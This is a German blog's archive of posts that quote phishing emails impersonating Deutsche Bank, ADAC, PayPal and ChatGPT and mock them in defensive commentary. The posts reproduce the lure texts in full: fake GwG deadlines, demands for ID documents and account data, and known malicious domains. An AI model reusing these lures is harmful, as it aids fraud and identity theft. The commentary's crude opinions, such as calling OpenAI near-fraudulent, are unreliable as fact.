Kategoriearchiv „Phishing“

🔒 WICHTIG: Verpflichtende Stammdaten-Aktualisierung – Frist 14 Tage (§ 10 GwG)

Sonntag, 16. November 2025

⚠️ Achtung: Diese E-Mail kommt nicht von der Deutschen Bank. Sie ist eine Spam zur Einleitung eines Trickbetrugs. Nicht in die Mail klicken! ⚠️

Oh, toll, mit Paragraph schon im Betreff. Und mit Emoji. Eine Kombination für die Götter und die Spötter! 😅️

Wer schreibt mir denn so schön?

Von: Deutsche-Bank <secure@deutsche-bank.de>

Aber ich habe doch gar kein Konto bei der Deutschen Zang mit ihrem Leih-Stunk, der Leiden schafft. Ein Blick in den Mailheader zeigt mir erwartungsgemäß, dass die Mail über eine IP-Adresse aus Frankreich versendet wurde und auf ihrem Weg durchs wilde Internet keinen Server der Deutschen Bank auch nur von weitem gesehen hat. Die Absenderadresse ist natürlich eine Fälschung. Da die Deutsche Bank lobenswerterweise DKIM und SPF verwendet und der Spammer weder über eine IP-Adresse der Deutschen Bank senden konnte und noch über den geheimen DKIM-Signaturschlüssel verfügt, sollte diese Spam eigentlich überall aussortiert werden. Wenn nicht, sollte man vielleicht mal dem Mailprovider einen Hinweis auf bestehende Internetstandards geben.

Deutsche Bank

Ja, ist schon klar! Und ich bin übrigens Papst. Gestern habe ich das elfte Gebot unter den Trümmern meiner Religion gefunden. Es lautet: Du sollst immer Freude am Sex haben, denn es ist die beidarmige Gestalt der Liebe. Glaubt mir einfach, und ihr hüpft in den Himmel!

Deutsche Bank AG | Taunusanlage 12 | 60325 Frankfurt am Main | Deutschland

Das ist doch immer gut und so richtig voll sinnvoll, wenn in einer E-Mail schon lange vor dem eigentlichen Inhalt erst einmal die Postanschrift des Absenders steht. So für den Fall, dass man die Mail ausdrucken und als Sackpost zurücksenden möchte.

Normale Unternehmen haben ihr Impressum unten, weil sie in den meisten Fällen etwas wichtigeres mitzuteilen haben.

Betreff: Verpflichtende Aktualisierung Ihrer Stammdaten gemäß § 10 GwG – Frist: 14 Kalendertage

Oh, auch ohne Emoji? Aber der Betreff steht doch schon im Betreff der E-Mail. Vermutlich hat ein Absender, dem die Deutschkenntnisse etwas zu oberflächlich und hastig verabreicht wurden, ein angelerntes neuronales Netzwerk (von Journalisten, Politikern und anderen digitalen Analphabeten durchgehend mit dem Reklamewort „Künstliche Intelligenz“ benannt) darum gebeten, einen Brief zu formulieren. Und den verwendet er jetzt.

Sehr geehrte Damen und Herren,

Genau mein Name!

hiermit fordern wir Sie in unserer Funktion als verantwortliche Stelle gemäß Art. 5 EU-GwV auf, unverzüglich die Aktualisierung Ihrer Identitäts- und Legitimationsdaten durchzuführen.

Aber man hat der echten Deutschen Bank doch ein amtliches Ausweisdokument vorgelegt, um ein Konto zu eröffnen – und Vertragsbedingungen zugestimmt, dass man Änderungen an seinem persönlichen Kram – Hochzeit, Umzug, Geschlechtseintrag, Tod – so zeitnah wie nur möglich meldet. Das reicht als Sorgfaltspflicht. Da müsste die Deutsche Zang nicht auch noch eine E-Mail an „Sehr geehrte Damen und Herren“ senden, dass sie den ganzen Kram noch einmal mitteilen, obwohl die Deutsche Zang das alles schon kennt.

Ich will mal hoffen, dass die echte Deutsche Bank einen besseren und geringfügig menschlicheren Ton gegenüber ihren Kunden anschlägt, wenn sie auch mal etwas von ihnen will.

Pflicht zur unverzüglichen Aktualisierung

Gemäß § 10 GwG i.V.m. Art. 14 Abs. 5 EU-Geldwäscheverordnung (EU) 2015/849 sowie den aktuellen BaFin-Leitlinien sind Sie verpflichtet, innerhalb von 14 Kalendertagen nach Erhalt dieses Schreibens die vollständige Aktualisierung vorzunehmen.

Ärgerlicherweise für den Spammer kann man in einer E-Mail keine Frist setzen. Oder genauer: Man kann es schon, aber das ist dann möglicherweise wirkungslos. E-Mails sind in der BRD nur sehr bedingt rechtlich verbindlich. Die Einzelheiten sind kompliziert und ein bisschen schwierig zu überschauen, aber das ist im Neuland-Staat BRD, bei dem einige gesetzliche Regelungen für Internetdinge aus dem Jahr 1976 [!] kommen, nicht weiter überraschend. Deshalb würde man so eine gebieterische Aufforderung im Moment mit der Sackpost erhalten. Die kommt zwar auch immer häufiger nicht mehr beim vorgesehenen Empfänger an, aber als die gesetzlichen Grundlagen geschaffen und in grundlegenden Urteilen ausgelegt wurden, war die Post noch die größte Bundesbehörde der BRD (sogar mit eigener Dienstflagge) und nicht privatisiert – und vor allem: Sie hat noch funktioniert. Vordigital und mit ganz viel teurer Handarbeit von gutbezahlten Frühaufstehern. Heute hat die Bananenpost teures Porto und funktioniert nicht mehr, aber der Rechtsapparat ist träge und betrachtet immer noch die Zustände der Vergangenheit als relevant.

Na, was will der Phisher von mir?

Erforderliche Dokumente

Gültiger Reisepass oder Personalausweis (beidseitig, farbig)

Aktueller Adressnachweis (nicht älter als 3 Monate)

Steueridentifikationsnummer (Steuer-ID)

Bei juristischen Personen: Handelsregisterauszug (≤ 3 Monate)

Der Phisher will von mir nicht nur den Zugang zur Fernkontoführung der Deutschen Bank, sondern auch genug persönliche Daten für eine betrügerischen Identitätsmissbrauch.

Sichere Aktualisierung – Direkter Zugang

Nutzen Sie ausschließlich folgenden authentifizierten Zugang:

ZUR SICHEREN AKTUALISIERUNG

Wer da klickt, hat verloren.

Natürlich führt der Link nicht zur Website der Deutschen Bank, sondern zu einer Website in einer Domain…

$ surbl manor.simnate.info
manor.simnate.info	LISTED: ABUSE
$ _

…die bereits wegen Spam, Spam und noch mehr Spam auf allen Blacklists dieser Welt steht. Dort gibt es dann eine höchst kompliziert gecodete, sehr javascriptlastige Weiterleitungskette, die bei mir den Verdacht erweckt, das man sich auch Schadsoftware einfangen könnte, wenn Webbrowser oder Betrübssystem anfällig sind (niemand würde sonst derartig kryptisch coden). Am Ende der Weiterleitungskette ist man auf einer Website, die so aussieht:

Alles, was man dort eingibt, geht direkt an Kriminelle. Schon kurz, nachdem man sich „angemeldet“ hat und seine PIN eingegeben hat, wird ein „Bankmitarbeiter“ anrufen und um die Bestätigung einer Transaktion bitten, „um die Identifikation sicherzustellen“ oder aus ähnlichen Bullshit-Gründen. Danach ist das Konto bis an den äußersten Rand des Überziehungsrahmens futschikato leergefegt. Alle weiteren Daten, die man den Trickbetrügern gibt, werden für Betrugsgeschäfte aller Art benutzt, und das frisch übernommene Konto natürlich auch. Man hat eine Menge Geld verloren und nachhaltigen, jahrelangen Ärger mit Polizeien, Staatsanwälten, Inkassoklitschen, Anwälten, Auskunfteien und Untersuchungsrichtern, weil man auf einen Trickbetrüger reingefallen ist. Die Kosten, die einem dabei entstehen, bekommt man nicht ersetzt.

Zum Glück für uns alle gibt es einen hundertprozentig wirksamen Schutz gegen Phishing, die immer noch häufigste Form des Trickbetruges: Niemals in eine E-Mail klicken!

Stattdessen für jede häufiger besuchte und für Kriminelle interessante Website (Bank, Zahlungsdienstleister, Einkauf, Auktionsplattform, Social Media und ähnliches), bei der man ein Benutzerkonto hat, ein Lesezeichen im Webbrowser anlegen und diese Seite nur noch über dieses Lesezeichen aufrufen. Das geht auch schnell, einfach und mausklick, aber kein Verbrecher kann einem dann noch so leicht einen giftigen Link unterschieben.

Wenn man eine Mail wie diese empfängt und sich doch einmal unsicher ist (trotz des Emoji im Betreff), einfach die Website der Bank über das Lesezeichen aufrufen und sich dort wie gewohnt anmelden. Wenn man nach seiner Anmeldung keinen Hinweis auf das angebliche Problem sieht, hat man einen dieser gefürchteten Cyberangriffe abgewehrt. So einfach geht das. Macht das! 🛡️

Der Link führt in das TLS 1.3-verschlüsselte KYC-Portal mit 2FA. Weiterleitung an Dritte ist unzulässig.

Die Weiterleitung eines Links ist unzulässig? Weil… ähm… das in einer E-Mail steht, die offen wie eine Postkarte durch das Internet transportiert wurde und auf dem gesamten Weg von jedem beteiligten Server gelesen werden konnte. Ja ja, komm schon, Spammer, nimm wieder deine Medikamente! 🤡️

Rechtsfolgen bei Unterlassung:
✓ Ab Tag 15: Automatische Kontosperrung
✓ Ab Tag 30: Zwangsauflösung der Geschäftsbeziehung (§ 11 Abs. 3 GwG)
✓ Meldung an FIU Deutschland und BaFin

Wir bitten um sofortige Beachtung. Diese Maßnahme dient dem Schutz Ihrer Vermögenswerte und der Erfüllung gesetzlicher Sorgfaltspflichten.

Schon klar, es „schützt die Vermögenswerte“, wenn man in eine Mail klickt. Es fördert übrigens auch die Gesundheit, wenn man Zyankali nascht. 💀️

Dr. jur. Maximilian von Hohenberg
Head of Compliance & AML
Deutsche Bank AG
Taunusanlage 12, 60325 Frankfurt am Main
maximilian.hohenb███@db.com | +49 69 910-███27
Deutsche Bank AG | Taunusanlage 12 | 60325 Frankfurt am Main | Germany | Tel: +49 69 ███-00 | info@db.com | www.db.com

Die Telefonnummern und Mailadressen habe ich ein bisschen unkenntlich gemacht, denn man weiß ja nie bei einer Spam. Aber das sieht nach einem ganz normalen Mailimpressum aus, das vermutlich aus einer echten E-Mail der Deutschen Bank kopiert wurde.

Einfach löschen, den Müll, und gut! 🗑️

Aktualisierung Ihrer Telefonnummer und Ihrer Karte, die auf Validierung wartet.

Montag, 10. November 2025

Im Moment gibt es mal wieder Phishing bis der Mailserver raucht. Diese Spam ist von heute ganzfrühmorgen, 3:59 Uhr.

Von: ADAC Kreditkarte <infos@adac.de>

Ich will es mal so sagen: Ich habe kein Auto, keinen Führerschein, keine Kreditkarte und bin auch nicht im ADAC (was soll ich da auch). Trotzdem kommt dieser kriminelle Dreck bei mir an. Weil es ein Trickbetrug ist, der als völlig wahllose Schrotmunition der Spam jede Mailadresse trifft, die irgendwie an Betrüger gelangt ist. Spam kostet ja nichts, und ein paar leichtgläubige ADAC-Mitglieder wird die Spam schon erwischen.

Natürlich ist die Absenderadresse gefälscht. In Wirklichkeit wurde die Spam über eine Mailadresse aus Island versendet, was ein sehr seltener Gast im Spamglibber ist. Einen Server des ADAC hat sie niemals auch nur aus der Nähe gesehen. Natürlich wurde die Spam schon über SPF als Absenderfälschung erkannt und aussortiert. Natürlich ist auch DKIM einfach nicht verwendet worden. Eigentlich sollte diese Spam nirgends mehr ankommen, zumindest nicht ohne Kennzeichnung als Spam. Weil es eine hingestümperte und leicht automatisch erkennbare Spam ist.

ADAC

Und ich bin der Weihnachtsmann! 🧑‍🎄️

Wichtige Aktualisierung Ihrer Sicherheitsdienste

Was bitte? Ich habe gar keine Sicherheitsdienste. 😁️

Sehr geehrte ADAC-Mitglieder,

Genau mein Name!

seit dem 1. November 2025 haben wir neue Sicherheitsdienste in unser Schutzsystem integriert.

Das ist ja schön, dass „ihr“ euch um euren Technikkram kümmert. Was soll eigentlich ein „Sicherheitsdienst“ sein? Ich kenne das nur als Angebot des Bewachungsgewerbes. Kriege ich jetzt einen Wächter neben mein geparktes Auto, damit es keiner mehr klauen kann? Angesichts der tollen „Komfortschlösser“, die völlig verantwortungslos und kriminalitätsfördernd in die modernen Schleudern verbaut werden, wäre das nur angemessen. Und was soll ein „Schutzsystem“ sein? Für mich klingt das eher nach einem Kondom. Hoffentlich hat das keine Löcher. 😆️

Schon peinlich, wenn ein Betrüger mit tollen Begriffen beeindrucken will, aber selbst kaum Deutsch kann.

Was bedeutet das für Sie? Sie erhalten Zugang zu zusätzlichen Funktionen und profitieren weiterhin von den Ihnen bereits bekannten Diensten, ohne dass sich Ihre monatlichen Kosten ändern.

Ihre Vorteile auf einen Blick:

*5-Sterne-Schutz

*6 Reiseversicherungen inklusive

*2 % Rabatt auf Kraftstoff weltweit und vieles mehr

Ich habe gar nicht so viele schützenswerte Sterne, und der Kraftstoff fürs Fahrrad besteht aus Nudeln, auf die ich gewiss keinen Rabatt bekomme. Aber abgesehen von diesem Bullshit steht hier sehr wortreich, dass sich für mich lebenspraktisch gar nichts verändert.

Angelerntes neuronales Netzwerk? Oder fehlende „natürliche Intelligenz“ beim Deutschexperten in der Betrügerbande?

Um eine reibungslose Synchronisierung dieser neuen Dienste mit Ihrem Konto zu gewährleisten, empfehlen wir Ihnen, Ihre Telefonnummer und Ihre ADAC-Kreditkarte zu aktualisieren. Dieser Schritt ist unerlässlich, um die Sicherheit Ihrer Konten zu erhöhen und Ihren Vertrag zu aktualisieren.

Meine ADAC-Telefonnummer und Kreditkarte synchronisieren

Jede Spam ist auch ein Intelligenztest. Wer auf den Link klickt, hat den Test verloren. Wer den Test nicht verlieren will, klickt gar nicht erst in eine Mail, sondern legt sich für häufiger besuchte Websites, bei denen er ein Benutzerkonto hat, Lesezeichen im Browser an und ruft diese Websites nur noch über die Lesezeichen auf. Wenn man so einen Rotz wie diese betrügerische Spam erhalten hat, kann man einfach die ADAC-Website über das Browserlesezeichen aufrufen und sich ganz normal anmelden. Wenn es dort keinen Hinweis gibt, dass irgendein Problem besteht und dass man deshalb etwas tun muss, hat man einen dieser gefürchteten „Cyberangriffe“ abgewehrt, viel Geld gespart und nachhaltigen Ärger vermieden. So einfach geht das! Macht das! Klickt nicht in Mail! 🛡️

Der Link führt nicht etwa zur Website des ADAC, sondern zunächst in die Domain wes (strich) skipperpaule (punkt) helpjuice (punkt) com. Das sieht man übrigens, wenn man in seiner Mailsoftware den Mauszeiger auf dem Link liegen hat. Man braucht dafür also keinerlei technische Kenntnisse, sondern muss nur hinschauen. Aber am besten, man kommt gar nicht erst auf die Idee, in die Mail zu klicken. Das ist und bleibt der sicherste Schutz gegen Phishing, eine der immer noch häufigsten Methoden des Trickbetrugs im Internet.

Und hey, so so: „Vertrag aktualisieren“. Was ist denn der neue Vertragstext? Gibt es keinen? Worin besteht dann die Aktualisierung. Eigentlich muss spätestens bei dieser Formulierung völlig klar sein, dass es sich um unverständiges Geschwätz handelt, mit dem Dumme und Naive beeindruckt werden sollen. Doch selbst Dumme sollten wissen, dass man Verträge besser liest, bevor man ihnen zustimmt.

Diese Aktualisierung dauert nur wenige Minuten und ermöglicht Ihnen die sorgenfreie Nutzung der neuen Online-Dienste.

*Bitte beachten Sie, dass der ADAC bei Nichtbeachtung dieser Empfehlung keine Haftung für Schäden im Zusammenhang mit der Sicherheit Ihres Kontos übernehmen kann.

Bitte beachten: Nachdem man in eine Mail geklickt hat, darf man sich nicht wundern, wenn es teuer wird und möglicherweise jahrelangen Ärger gibt. Deshalb klickt man nicht in Mail. Natürlich sagen Trickbetrüger immer, dass man irgendwelche Nachteile hat, wenn man jetzt nicht sofort klickt, um ganz schnell ein Problem zu beheben. Das ist Lüge. Es sind Betrüger, die einen unter Druck setzen wollen. Der echte ADAC würde mit seinen Vereinsmitgliedern hoffentlich auch einen zivilisierteren Ton wählen.

Wir danken Ihnen für Ihr Verständnis und stehen Ihnen bei Fragen gerne zur Verfügung.

Keine miese Spam ist vollständig ohne den pseudohöflichen Dank für Nichts. Bei mir darf übrigens auch jeder mal hinten lecken.

Oder fehlt da noch etwas? Aber natürlich fehlt da noch etwas: Das juristisch völlig wirkungslose, nur zur Einschüchterung proklamierte „geistige Eigentum“ auf einen Mülltext, der noch nicht einmal in die Nähe einer schützenswerten Schöpfungshöhe gekommen ist, der fehlt noch. Aber hier ist er:

© 2025 ADAC. Alle Rechte vorbehalten.

Schön, dass man endlich mal wieder erfährt, welches Jahr wir gerade haben. Damit man es nicht vergisst.

Aktualisieren Sie Ihre Telefonnummer – 626285585837

Samstag, 8. November 2025

Aber das ist doch gar nicht meine Telefonnummer.

Von: РауРаІ <g1r7ff6l@smartfx.com>
An: undisclosed-recipients:;

Aber das kommt ja auch gar nicht von PayPal. Und es ist auch gar nicht für mich. Es ist für ganz viele Empfänger auf einmal.

РауРаІLogo

Oh, ist ja auch das Logo von „PayPai“, aber mit großem „i“. Ist trotzdem nicht durch den Spamfilter geflutscht.

Aktualisieren Sie Ihre Telefonnummer

Das stand schon im Betreff, dort allerdings mit irgendeiner sinnlosen Nummer.

Sehr geehrte Kundin, sehr geehrter Kunde,

Natürlich weiß der Absender nicht, wer ich bin.

um die Sicherheit Ihres РауРаІ-Kontos zu gewährleisten, bitten wir Sie, Ihre Telefonnummer zu aktualisieren. Dadurch können wir Sie bei wichtigen Mitteilungen oder sicherheitsrelevanten Ereignissen besser erreichen.

Ich habe aber kein „PayPai“-Konto mit großem „i“. Und ich bin für PayPal, also das richtige Paypal, nicht das PayPal aus der kriminellen Fantasie eines Trickbetrügers, jederzeit zu erreichen. PayPal hat eine Mailadresse von mir, die ich nur für PayPal verwende. Darauf würde übrigens auch eine Mail von PayPal ankommen. Dieses „PayPai“ schreibt hingegen an eine Mailadresse, die ich früher, bevor sie völlig spamverseucht war, für ganz allgemeines Zeug verwendet habe. Deshalb kann ich so ein Phishing sofort erkennen, ohne umständlich nachdenken zu müssen. Ich empfehle es übrigens zur Nachahmung, dass man für „kriminell interessante“ Dienstleister wie PayPal spezielle Mailadressen verwendet. Es ist ein sehr einfacher Schutz, der zu verhindern hilft, dass man unter den Bedingungen von Stress und Müdigkeit einmal auf die häufigste Trickbetrugsmasche des gegenwärtigen Internet, auf Phishing, reinfällt.

Bitte klicken Sie auf den folgenden Button, um Ihre Telefonnummer zu aktualisieren:

Telefonnummer aktualisieren

Natürlich führt der Link nicht zu PayPal. Das sieht man übrigens in der Statusleiste seiner Mailsoftware, wenn man mit dem Mauszeiger über den Link fährt. Die verlinkte Domain…

$ surbl aiutoallostudio.com
aiutoallostudio.com	LISTED: PH
$ _

…steht schon wegen Trickbetrugs (Phishing) auf allen Blacklists. Darauf kann man sich leider nicht verlassen.

Vielen Dank für Ihre Zusammenarbeit und dass Sie РауРаІ nutzen.

Vielen Dank für den pseudohöflichen Dank für nichts! Vor meinem Arsch ist auch kein Gitter!

Mit freundlichen Grüßen,
Ihr РауРаІ-Team

Mit gierigem Gewinke
Euer Trickbetrüger

© 2025 РауРаІ. Alle Rechte vorbehalten.

Keine betrügerische Bullshit-Spam ist vollständig ohne die Proklamation eines geistigen Eigentums auf einen Text, der nicht einmal in die Nähe der Schöpfungshöhe kommt, die für einen Schutz durch das Urheberrecht sorgt. Aber immerhin, so werde ich noch einmal daran erinnert, welches Jahr wir gerade haben. Das vergisst man ja immer, wenn man die Nachrichten sieht und es allerorten mit Volldampf in die Dreißiger Jahre oder ins Mittelalter zurückgeht.

Diese Nachricht wurde automatisch generiert – bitte antworten Sie nicht darauf.

Und zum Abschluss der erste wahre Satz in der Spam. 😁️

Habe ich Abschluss geschrieben? Wie konnte ich nur. Auf diesen „Abschluss“ folgen 110 leere Absätze, und dann gibt es nochmal eine Portion „Spamprosa“, mit der dem Spamfilter etwas „Inhalt“ vorgespielt werden soll. Natürlich denkt sich der Spammer da nicht selbst einen Text aus, sondern er kopiert einfach irgendeine echte Mail hinein:

Meine Bestellungen Mein Konto Erneut kaufen

Dein Paket wurde versendet!

Bestellt Versendet In Zustellung Zugestellt

Zustellung: 7. November – 17. November
Kerstin – Kreuztal
Bestellnr. ‫306-5829326-9163534

Lieferung verfolgen

Ezcasch Terrassenplane mit Reißve…
Verkauf durch Ezcasch
Zustand: Neu
Menge: 1
14599€ [sic!]

Summe 145.99€ [sic!]

Amazon.de ist ein Handelsname für Amazon EU Sarl, für Amazon Europe Core Sarl, für Amazon Media EU Sarl und für Amazon EU Sarl, die alle ihren eingetragenen Sitz unter 38 avenue John F. Kennedy, L-1855 Luxemburg haben und für die Amazon Digital Germany GmbH, mit eingetragenem Sitz in der Domagkstr. 28, 80807 München, Deutschland. ©2025 Amazon.com, Inc. oder verbundene Unternehmen. Amazon sowie alle zugehörigen Marken sind Marken der Amazon.com, Inc. oder deren verbundenen Unternehmen. Es können Versandkosten anfallen. Für Ihren Kauf gilt der Preis und die Verfügbarkeit, die zum Zeitpunkt des Kaufs auf amazon.de angezeigt werden.

Besuche unser Online-Rückgabezentrum, um deinen Artikel zurückzugeben. Falls du unser Online-Rücksendezentrum nicht nutzen und dein Widerrufsrecht ausüben möchtest, kannst du dieses Formular verwenden.

Amazon EU société à responsabilité limitée, 38 avenue John F. Kennedy, L-1855 Luxemburg. Aktienkapital: 165.833 EUR. RCS Luxembourg-Nummer: B 101818. Handelsregisternummer: 134248. Umsatzsteuerliche Registrierungsnummer in Luxemburg: LU 20260743.

Hui, ebenfalls mit juristisch völlig wirkungslos proklamierten geistiges Eigentum. Amazon ist doch kein Betrüger, der die Leute mit irgendeiner hilflosen Jurafuchtelei beeindrucken muss, sondern hat ein tragfähiges und legales Geschäftsmodell. Um auch mal etwas Gutes über Amazon zu sagen. Aber wenn ich so etwas sehe – es ist vermutlich aus einer echten Amazon-Mail kopiert – dann weiß ich, dass Amazon die Intelligenz seiner Kunden verachtet. Ich würde ja keine Geschäfte mit jemanden machen, der mich verachtet und für dumm hält. 🙃️

Natürlich hat der Trick mit der Spamprosa nicht geklappt. Was Wunder, wenn man im Phishing eine Domain verlinkt, die wegen Phishings auf den Blacklists steht.

Ζаhⅼսոցѕрrоbⅼеⅿ: Αktսаⅼіѕіеrսոց еrfοrⅾеrⅼісh, սⅿ Ӏhr Αbоոոеⅿеոt fоrtzսѕеtzеո

Donnerstag, 30. Oktober 2025

Oh, schön, mit lustigen, aber auch etwas versteckten Unicodezeichen im Betreff, damit der Müll durch die Spamfilter kommt. Hat natürlich nicht geklappt, sondern gleich noch mal ein paar Zusatzpünktchen gegeben. 🤭️

Wer schreibt mir denn heute?

Von: СhаtᏀΡТ-Ζаhⅼսոցеո <no-reply@chatgpt.de>

Bis eben wusste ich nicht einmal, dass man bei ChatGPT auch etwas abonnieren kann. Ich nutze ja keine angelernten neuronalen Netzwerke, außer vielleicht, um ein paar Quatschbilder zu machen (das hat längst keinen Sinn mehr, die Bilder sind tendenziell kitschig und unbrauchbar geworden, das dekorative Roboter-Bild an der Seite ist schon anderthalb Jahre alt und stammt aus einer Übergangszeit, in der die Verkitschung noch erträglich und wenigstens einige Bilder noch benutzbar waren) oder um mal zu schauen, ob sich da inzwischen wirklich Spuren von „Intelligenz“ zeigen, die nicht einfach nur aufwändig gekünstelt sind. Aber es gibt immer noch nur den Gnobbelmatsch des künstlichen Dunning-Kruger-Effektes. Unfassbar, dass Menschen mit so einem unbrauchbaren und dummen Schrott ernsthaft etwas anfangen wollen. Unfassbar, dass Journalisten sich auf so einen Schrott verlassen. Oder, dass so genannte „Entscheidungsträger“ – das ist ein modernes deutsches Wort für technisch inkompetente Geldverbrenner – damit die Produktivität steigern wollen. Und jetzt kriege ich angeblich schon Zahlungsprobleme. Mit lustigen Unicode-Zeichen.

Die Spam entspricht vollständig dem normalen Phishing-Schema:

ChatGPT Logo

ChatGPT-Abonnement

Abonnement-Aktualisierung erforderlich | 2025

Sehr geehrte Kundin, sehr geehrter Kunde,

Wir haben festgestellt, dass Ihr ChatGPT-Abonnement aktualisiert werden muss, um Unterbrechungen Ihres Dienstes zu vermeiden.

Wichtig: Wenn Ihr Abonnement nicht innerhalb von 48 Stunden aktualisiert wird, kann der Zugriff auf Premium-Funktionen eingeschränkt oder ausgesetzt werden.

Um einen unterbrechungsfreien Zugriff sicherzustellen, aktualisieren Sie bitte Ihre Abonnementdaten über den folgenden Button:

Abonnement aktualisieren

Wenn Sie Fragen haben oder Hilfe benötigen, steht Ihnen unser Support-Team gerne zur Verfügung.

Vielen Dank, dass Sie ChatGPT nutzen.

Mit freundlichen Grüßen,

ChatGPT Support-Team

OpenAI Services

123 Innovation Way, Virtual City

Tel: +1 (800) 123-4567

© 2025 ChatGPT. Alle Rechte vorbehalten.
Bitte überprüfen Sie offizielle Links und geben Sie Ihre Daten nicht auf verdächtigen Webseiten ein.

Nein, die Telefonnummer ist nicht von mir so hingeschrieben, die steht da wirklich so. Die ist ja einprägsam wie mein Passwort! 🤭️

Aber da steht ja auch, dass ich ChatGPT nutze und sogar dafür bezahle. Das stimmt nicht. Die bedanken sich sogar pseudohöflich dafür. Obwohl es gar nicht stimmt.

Der Link führt in eine Website bei einem kommerziellen Anbieter, bei dem man auf WordPress basierende Websites hosten, einrichten und pflegen kann – und die Phishing-Website dort ist schon weg, weil die meisten anderen Unternehmen als Google eben keine Lust haben, zum besten Freund des Spammers und Betrügers zu werden. Aber wir wissen ja alle, was es dort gegeben hätte: Man konnte sich dort auf einer „liebevoll“ nachgemachten Website „anmelden“, und danach gehört das Konto einem betrügerischen Spammer. Der kann dann zum Beispiel die teuren Premiumzugänge anderer Leute (zurzeit immerhin 276 € pro Jahr¹ für die einfachste Stufe, den billigen Plus-Account) kostenlos einsammeln und irgendwo billiger weiterverkaufen. Vielleicht sogar mehrfach. Und weil es ja angeblich ein „Zahlungsproblem“ gibt, wird vielleicht auch gleich die Kreditkarte übernommen. Er ist ja ein Betrüger, wie man schon an dieser Spam mit dem versuchten Trickbetrug sieht.

Ich bin mal gespannt, ob ich in Zukunft noch häufiger ein Phishing auf Benutzerkonten bei Anbietern angelernter neuronaler Netzwerke sehen werde. Wie viele Leute dafür inzwischen – nach jahrelanger Reklame im contentindustriellen Journalismus unter ständiger Benutzung des Reklamewortes „Künstliche Intelligenz“ – Geld auszugeben bereit sind.

Zum Glück für uns alle gibt es einen sehr einfachen, kostenlosen und fehlerfrei wirksamen Schutz gegen Phishing: Niemals in eine E-Mail klicken! Stattdessen für häufig besuchte Websites, bei denen man ein Nutzerkonto hat, immer ein Lesezeichen im Webbrowser anlegen und diese Websites nur noch über das Lesezeichen aufrufen. Wenn man nicht in eine E-Mail klickt, kann einem kein Trickbetrüger so einfach einen giftigen Link unterschieben. Sollte einmal eine „komische Mail“ ankommen, bei der man nicht sofort weiß, dass es eine Spam ist, nicht in diese Mail klicken, sondern einfach die Website über das Lesezeichen im Browser aufrufen und sich dort wie gewohnt anmelden. Wenn man danach keinen Hinweis auf das angebliche Problem sieht, hat man eine dieser gefürchteten „Cyberattacken“ abgewehrt. So einfach geht das. Macht das! 🛡️

¹Ich hätte das gern verlinkt, aber Open AI hält es für eine gute Idee, seine Preisliste mit vorsätzlicher Technikverhinderung nicht archivierbar zu machen, so dass ich meinen Preis nicht belege. Es ist schon sehr seltsam, dass nur die Preise, also das Wesentliche, in der Preisliste fehlen. Ich habe diese ganzen Klitschen noch nie für besonders vertrauenswürdig gehalten, aber jetzt bin ich mir völlig sicher, dass die kein seriöses Geschäftsmodell haben und klar vorsätzlich am Rande grenzbetrügerischer Machenschaften arbeiten. Warum sonst sollte man die Archivierung einer Preistabelle vorsätzlich sabotieren, wenn man nichts Übles beabsichtigt?

Aktualisiere deine persönlichen Daten für mehr Sicherheit.

Montag, 27. Oktober 2025

⚠️ Phishing-Alarm! ⚠️

Von: ADAC <datenschutz@adac.de>
An: ADAC | Online <datenschutz@adac.de>

Da stehe ich ja gar nicht als Empfänger drin. Die schreiben einfach an sich selbst. 🤭️

Die Mail wurde übrigens über eine IP-Adresse aus Island versendet. Sie kommt nicht vom ADAC. Deshalb kommt sie auch bei Menschen wie mir an, die kein Mitglied des ADAC sind, nicht autofahren und noch nicht einmal einen Führerschein haben. Dieser Müll geht an alle möglichen Mailadressen:

ADAC – Kundendienst

🔔 Dringende Sicherheitsüberprüfung – Bitte reagieren Sie umgehend!

Sehr geehrte Damen und Herren,

bei einer routinemäßigen Überprüfung Ihrer Kontoinformationen wurden Unregelmäßigkeiten festgestellt. Um Ihr Benutzerkonto vor möglichen Risiken zu schützen und dessen volle Funktionalität zu gewährleisten, bitten wir Sie, Ihre Angaben zu überprüfen und bei Bedarf zu aktualisieren.

Zur schnellen Bestätigung Ihrer Daten klicken Sie bitte auf den nachstehenden Link und folgen Sie den angezeigten Schritten:

Daten jetzt überprüfen

Der Link geht natürlich auch nicht zum ADAC. Wer da klickt, besucht die Website von kriminellen Spammern.

Wir danken Ihnen für Ihre Aufmerksamkeit und Ihr entgegengebrachtes Vertrauen.

Vielen Dank für den pseudohöflichen Dank für nichts an die sehr geehrten Damen und Herren.

Batteriegesetz Widerrufsbelehrung Datenschutz AGB Impressum

Auf ein im deutschen Rechtsraum für gewerbliche E-Mail obligatorisches E-Mail-Impressum wurde hingegen verzichtet. Ein kaputter Link – alle fünf Links führen nicht ins Web – ist kein Ersatz für die erforderlichen Angaben. Es wäre nicht einmal ein Ersatz, wenn der Link auf ein Impressum in einer Website führte. Der ADAC würde sicherlich die Gesetze der BRD einhalten.

Bitte nicht darauf reinfallen und einfach löschen!

Erinnerung: Identitätsnachweis für Ihr Online-Banking erforderlich

Donnerstag, 23. Oktober 2025

Phishingalarm! 🎣️

Von: Ꮲaypal <postmaster@02b32ad9e2.nxcli.io>

Das ist nicht PayPal.

Paypal, Paypal Icon, Paypal Logo …

Da hilft auch alle eingebettete Grafik nicht, deren Alternativtexte ich sehe, der Absender dieser Spam ist nicht Paypal, und um das zu sehen, muss man nur auf die Absenderadresse schauen. Die Mailadresse des Absenders liegt nicht in der Domain von Paypal. (Das ist übrigens kein sicheres Erkennungszeichen. Aber hier hätte es gereicht.)

sehr geehrter Kunde,

Das ist nicht mein Name.

Wir haben Sie kürzlich gebeten, Ihre Identität online zu verifizieren, haben Ihr Dokument jedoch leider noch nicht erhalten.

Was für ein Dokument wollt ihr denn „online“ von mir? Reicht ein Foto vom Yps-Ausweis? Oder muss ich mühsam eines der vielen Fotos eines Personalausweises oder Reisepasses irgendwo runterladen, das in den letzten Datenschleudereien von irgendwelchen Unternehmen veröffentlicht wurde? 🤭️

Ohne Verifizierung können Sie ab dem 24. Oktober keine Online-Banking-Dienste mehr nutzen. Zur Verifizierung benötigen Sie die Referenznummer in dieser E-Mail.

Die Gärung Nummer lautet: 501541.

Die was für eine Nummer bitte? 🤣️

